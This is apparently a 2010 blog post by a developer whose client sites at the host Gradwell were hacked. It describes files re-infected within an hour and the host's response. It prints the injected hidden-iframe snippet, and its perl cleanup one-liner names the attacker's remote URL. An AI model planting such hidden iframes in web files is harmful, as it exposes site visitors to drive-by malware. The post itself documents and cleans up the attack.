Gradwell Hacked

I woke up this morning to find all my clients' sites hosted at Gradwell have been hacked.

A quick poke around on shows that many other sites hosted on Gradwell's cluster have been similarly altered.

The hacker has added some HTML for a hidden iframe which points to a remote site. Presumably this site serves some sort of drive-by download attack.

Here's the code that is either prepended or appended to all .php and .html files:

<iframe src="" style="display:none"></iframe>

I cleaned up the files as soon as I noticed the attack with this one-liner:

find . -name '*.php' -or -name '*.html' | xargs -n1 perl -pi -e "s/\<iframe src\=\"http\:\/\/gaccess\.dynsite\.net\/blog\/wp-content\/0wn3d\/\" style\=\"display:none\"\>\<\/iframe\>//" 

(NB: this should all be on one line)

The files were re-infected an hour or so later. Re-infection seems to have stopped now.

The attacker evidently has access to the entire home directory - not just the apache web root - as library files outside the web root were also affected.

I reported the breach to support and am awaiting the outcome.

Luckily for me, the Primesolid site wasn't affected as I no longer host it at Gradwell.

There's a thread about this on


Peter Gradwell says: there must be some sort of exploit in apache itself so we are also looking at that, and it's permissions model.

Update 2010-12-19 10:03

Gradwell have been hacked again this morning.

Exactly the same attack code has been added to all php and html files. Timestamps are updated to 2010-12-19 05:22. :-/

  • December 15, 2010
comments powered by Disqus
Back to Top